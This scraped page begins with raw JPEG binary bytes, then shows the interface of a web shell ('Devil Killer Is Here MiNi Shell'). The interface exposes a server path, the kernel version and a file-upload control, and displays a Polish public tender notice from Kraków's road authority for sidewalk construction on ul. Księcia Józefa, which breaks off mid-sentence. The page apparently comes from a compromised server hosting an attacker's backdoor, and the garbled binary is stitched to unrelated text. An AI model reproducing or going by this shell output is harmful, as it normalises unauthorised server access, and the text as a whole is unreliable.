JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251015/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251015/0047573101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych dla zadania pn.: &#34;ul. Księcia Józefa - budowa chodnika po stronie południowej na odcinku od przystanku Bielany Obwodnica do wlotu sięgacza do posesji nr 230&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miasta Krakowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 357116163</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Centralna 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-586</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48126167000</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48126167417</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdmk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdmk.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych dla zadania pn.: &#34;ul. Księcia Józefa - budowa chodnika po stronie południowej na odcinku od przystanku Bielany Obwodnica do wlotu sięgacza do posesji nr 230&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66077eee-a339-4f4e-9921-920ee63b7a2a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00475731</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038804/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.117 ul. Księcia Józefa - budowa chodnika po stronie południowej na odcinku od przystanku Bielany Obwodnica do wylotu sięgacza do posesji nr 230.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdmk.krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl w profilu nabywcy pod adresem: https://platformazakupowa.pl/pn/zdmk.krakow.<br/>2. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>3. Szczegółowe uregulowania w zakresie korespondencji zawiera SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r.. poz. 2452), określa niezbędne wymagania sprzętowo – aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod ww.<br/>adresem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod ww. adresem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 14 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>˗ Administratorem Pani/Pana danych osobowych jest Zarząd Dróg Miasta Krakowa z siedzibą ul. Centralna 53, 31-586 Kraków<br/>(dalej: „ZDMK” lub „Zamawiający”);<br/>˗ Kontakt do Inspektora Ochrony Danych: iod@zdmk.krakow.pl;<br/>˗ Pani/Pana dane osobowe będą przetwarzane w celu:<br/>= kontaktu, współpracy przez Zamawiającego z przedstawicielami Wykonawcy wskazanymi przez Wykonawcę jako osoby<br/>nadzorujące i koordynujące realizację umowy ze strony Wykonawcy, jako osoby realizujące określone obowiązki oraz osoby<br/>uczestniczące w realizacji Inwestycji, na których doświadczenie Wykonawca powoływał się w celu wykazania spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu,<br/>=oceny wypełniania przez Wykonawcę obowiązków umownych w zakresie dysponowania personelem spełniającym wymogi<br/>określone w umowie,<br/>˗ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO - przetwarzanie jest niezbędne do wypełnienia<br/>obowiązku prawnego ciążącego na administratorze w celu związanym z niniejszym postępowaniem o udzielenie zamówienia<br/>publicznego;<br/>˗ Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie umowa oraz dokumentacja<br/>związana z jej wykonywaniem w oparciu o obowiązujące przepisy prawa;<br/>˗ Pani/Pana dane osobowe będą przechowywane, przez okres 3 lat od dnia zakończenia okresu gwarancji lub rękojmi udzielonej<br/>przez Wykonawcę na roboty budowlane lub usługi realizowane w ramach Inwestycji oraz przez okres trwałości projektu<br/>dofinansowanego ze środków Unii Europejskiej (gdy Inwestycja jest dofinansowywana ze środków UE);<br/>˗ Podanie przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest dobrowolne; konsekwencje niepodania<br/>określonych danych stanowi naruszenie postanowień umowy zawartej pomiędzy Wykonawcą a Zamawiającym o realizacji Inwestycji;<br/>˗ W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>˗ Źródłem pochodzenia Pani/Pana danych jest Wykonawca Inwestycji;<br/>˗ Posiada Pani/Pan:<br/>=na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>=na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>=na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>= prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>=prawo sprzeciwu, z przyczyn związanych z Pani/Pana szczególną sytuacją - wobec przetwarzania danych osobowych,<br/>˗ nie przysługuje Pani/Panu:<br/>= w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>= prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">7/X/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Opis przedmiotu zamówienia:<br/>a) Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu<br/>robót budowlanych dla zadania pn.: &#34;ul. Księcia Józefa - budowa chodnika po<br/>stronie południowej na odcinku od przystanku Bielany Obwodnica do wlotu<br/>sięgacza do posesji nr 230&#34;,<br/>b) Zamawiający opisał przedmiot zamówienia za pomocą następujących<br/>dokumentów:<br/>• Projektowane postanowienia umowy (PPU), tj. załącznik nr 2 do SWZ,<br/>• Specyfikacja techniczna wykonania i odbioru robót budowlanych<br/>(STWiORB), tj. załącznik nr 8 do SWZ,<br/>• Dokumentacja projektowa, tj. załącznik nr 9 do SWZ,<br/>• Przedmiar robót, tj. załącznik nr 10 do SWZ,<br/>c) Wykonawca zobowiązany jest udzielić:<br/>•minimum 48 miesięcy,<br/>•maksymalnie 60 miesięcy,<br/>gwarancji jakości na przedmiot umowy.<br/>d) W przypadku wystąpienia w którymkolwiek załączniku do SWZ nazw<br/>producenta, znaków towarowych, norm, aprobat, specyfikacji technicznych<br/>i systemów odniesienia produkty można zastąpić równoważnymi. Za<br/>rozwiązania równoważne Zamawiający uzna takie rozwiązania, które<br/>umożliwiają uzyskanie efektu założonego przez Zamawiającego za pomocą<br/>innych rozwiązań technicznych. Za rozwiązania równoważne nie można uznać<br/>rozwiązania identycznego (tożsamego), a jedynie takie, które<br/>w porównywanych cechach wskazuje dokładnie tą samą lub bardzo zbliżoną<br/>wartość użytkową. Poprzez wskazanie nazw producenta, znaków towarowych,<br/>norm, aprobat czy systemów odniesienia Zamawiający miał na celu określenie<br/>minimalnych parametrów jakościowych i cech użytkowych, jakim muszą<br/>odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego<br/>i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Poprzez<br/>zapis dotyczący minimalnych wymagań parametrów jakościowych,<br/>Zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych<br/>źródłach, katalogach, stronach internetowych producentów, i tym podobnych.<br/>Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do<br/>określonego rozwiązania.<br/>2. Umowa o podwykonawstwo, której przedmiotem są roboty budowlane, powinna<br/>być zgodna z załącznikiem nr 2 do SWZ, tj. PPU. Niespełnienie danego warunku<br/>spowoduje zgłoszenie przez Zamawiającego odpowiednio zastrzeżeń lub<br/>sprzeciwu.<br/>3. Zamawiający, zgodnie z art. 95 ust. 1 ustawy Pzp, wymaga zatrudnienia przez<br/>Wykonawcę lub Podwykonawcę na podstawie stosunku pracy, osób<br/>wykonujących wskazane niżej czynności za wyjątkiem osób pełniących tzw.<br/>samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy Prawo<br/>budowlane:<br/>•pracownicy niższego szczebla technicznego (organizowanie i realizacja robót<br/>budowlanych),<br/>•pracownicy fizyczni (bezpośrednie wykonywanie robót budowlanych).<br/>Zamawiający dopuszcza możliwość osobistego realizowania zamówienia przez<br/>osoby prowadzące działalność gospodarczą lub wspólników spółki prawa<br/>handlowego.<br/>4. Zamawiający przed podpisaniem umowy jak i w trakcie jej realizacji ma prawo do<br/>kontroli spełnienia przez Wykonawcę lub Podwykonawcę wymagania wskazanego<br/>w pkt 3 w Części 1 SWZ, zgodnie z zapisami PPU. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na<br/>powtórzeniu podobnych rodzajowo zamówień, zgodnych z przedmiotem<br/>zamówienia podstawowego, o których mowa w art. 214 ust. 1 pkt 7) ustawy<br/>Pzp w wysokości nieprzekraczającej 50% wartości zamówienia<br/>podstawowego. Warunki na jakich zostanie udzielone zamówienie będą<br/>odpowiadały warunkom niniejszego postępowania określonym w PPU i jego<br/>załącznikach oraz w SWZ z uwzględnieniem szczególnych uwarunkowań<br/>wynikających z okoliczności udzielenia zamówienia podobnego oraz specyfiki<br/>zakresu przedmiotowego zamówienia podobnego. Udzielenie zamówienia, o<br/>którym mowa w art. 214 ust. 1 pkt 7) ustawy Pzp nastąpi po przeprowadzeniu<br/>postępowania właściwego dla zamówienia z wolnej ręki. Wraz z zaproszeniem do<br/>negocjacji zostaną przekazane Wykonawcy w szczególności niezbędne informacje<br/>i dokumenty opisujące szczegółowo zakres przedmiotowy zamówienia<br/>podobnego, warunki jego realizacji, warunki udziału w postępowaniu (jeśli<br/>Zamawiający je określi) oraz sposób przeprowadzenia negocjacji. Zamówienia<br/>polegające na powtórzeniu podobnych rodzajowo zamówień, o których mowa<br/>wyżej zostaną udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba<br/>rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe<br/>na ten cel.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>C (Cena brutto) = 60%<br/>Wykonawca, który zaproponuje najniższą cenę spośród ofert spełniających<br/>wymagania, otrzyma 60 punktów, natomiast pozostali Wykonawcy, odpowiednio<br/>mniej punktów według poniższego wzoru:<br/>C = Cena minimalna ÷ Cena badanej oferty ∗ 60 punktów<br/>G (Okres gwarancji jakości na przedmiot umowy) = 40%<br/>N = C + G<br/>gdzie:<br/>N - łączna ilość punktów badanej oferty,<br/>C - ilość punktów badanej oferty w kryterium cena brutto,<br/>G - ilość punktów badanej oferty w kryterium okres gwarancji jakości na przedmiot<br/>umowy.<br/>Sposób oceny:<br/>˗ 48 miesięcy = 0 punktów,<br/>˗ 60 miesięcy = 40 punktów,<br/>Uwaga!<br/>Oferty zawierające okres gwarancji jakości na przedmiot umowy krótszy niż 48<br/>miesięcy, zostaną odrzucone jako nie spełniające wymagań SWZ.<br/>Jedną propozycję należy wykreślić, a zaznaczyć tylko jedną właściwą. W<br/>przypadku nie wskazania oferowanego okresu gwarancji jakości na przedmiot<br/>umowy, tj. wykreślenie wszystkich pozycji lub nie zaznaczenia żadnej propozycji,<br/>Zamawiający uzna, iż Wykonawca zaproponował najkrótszy wymagany przez<br/>Zamawiającego okres gwarancji jakości na przedmiot umowy, tj. wynoszący 48<br/>miesięcy.<br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie<br/>wymagania określone w SWZ oraz otrzyma największą liczbę punktów.<br/>3. Zamawiający przyjmuje, że 1 punkt = 1%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają<br/>warunki dotyczące:<br/>a) Zdolności do występowania w obrocie gospodarczym:<br/>•Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) Uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>•Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) Sytuacji ekonomicznej lub finansowej:<br/>•Zamawiający nie stawia warunku w powyższym zakresie.<br/>d) Zdolności technicznej lub zawodowej, tj.:<br/>•Posiadają wiedzę i doświadczenie, tj. w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy, w tym okresie wykonali:<br/>▪ co najmniej 2 roboty budowlane polegające na wybudowaniu chodnika<br/>o długości minimum 100 m,<br/>▪ co najmniej 1 robota budowlana polegające na wykonaniu kablowej linii<br/>oświetlenia ulicznego na długości co najmniej 100 m lub złożonej z co<br/>najmniej 3 słupów oświetleniowych.<br/>Uwaga!<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia/spółki cywilnej/wykonawcy polegającego na zasobach innego<br/>podmiotu, powyższy warunek, tj. „co najmniej 2 roboty budowlane polegające na wybudowaniu chodnika o długości minimum 100 m”, zostanie uznany za<br/>spełniony gdy co najmniej dwa zamówienia samodzielnie wykonał jeden z<br/>wykonawców wspólnie ubiegających się o zamówienie/spółka cywilna/jeden ze<br/>wspólników spółki cywilnej/podmiot udostępniający wykonawcy swoje zasoby.<br/>•Dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami<br/>posiadającymi wykształcenie i kwalifikacje zawodowe z uprawnieniami<br/>budowlanymi do projektowania i kierowania robotami budowlanymi (co<br/>najmniej jedną osobą) bez 